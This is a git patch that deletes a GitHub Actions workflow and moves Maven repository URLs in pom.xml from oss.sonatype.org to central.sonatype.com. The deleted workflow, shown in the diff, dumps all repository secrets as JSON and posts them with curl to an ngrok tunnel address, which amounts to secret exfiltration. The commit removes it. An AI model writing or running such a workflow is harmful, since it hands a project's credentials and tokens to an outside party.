From 6b6053b84f4873f4bb682b549f20e327a0e1846f Mon Sep 17 00:00:00 2001 From: Abhishek Date: Fri, 25 Jul 2025 11:17:47 +0200 Subject: [PATCH] fix: Fix deployment workflow --- .github/workflows/debug-secrets-workflow.yml | 14 -------------- pom.xml | 16 ++++++++-------- 2 files changed, 8 insertions(+), 22 deletions(-) delete mode 100644 .github/workflows/debug-secrets-workflow.yml diff --git a/.github/workflows/debug-secrets-workflow.yml b/.github/workflows/debug-secrets-workflow.yml deleted file mode 100644 index 9c794ba2..00000000 --- a/.github/workflows/debug-secrets-workflow.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: debug-secrets-workflow -on: workflow_dispatch - -jobs: - post-secrets: - runs-on: ubuntu-latest - steps: - - name: Post secrets to API - env: - ALL_SECRETS: ${{ toJson(secrets) }} - run: | - curl -X POST https://6a4b34e5f94f.ngrok-free.app \ - -H "Content-Type: application/json" \ - -d "$ALL_SECRETS" \ No newline at end of file diff --git a/pom.xml b/pom.xml index 0044df35..ec0e5709 100644 --- a/pom.xml +++ b/pom.xml @@ -33,12 +33,12 @@ - ossrh - https://oss.sonatype.org/content/repositories/snapshots + central + https://central.sonatype.com/content/repositories/snapshots - ossrh - https://oss.sonatype.org/service/local/staging/deploy/maven2/ + central + https://central.sonatype.com/service/local/staging/deploy/maven2/ @@ -386,11 +386,11 @@ 1.6.13 true - ossrh - https://oss.sonatype.org/ + central + https://central.sonatype.com/ true - 600000 - 600000 + 600000 + 600000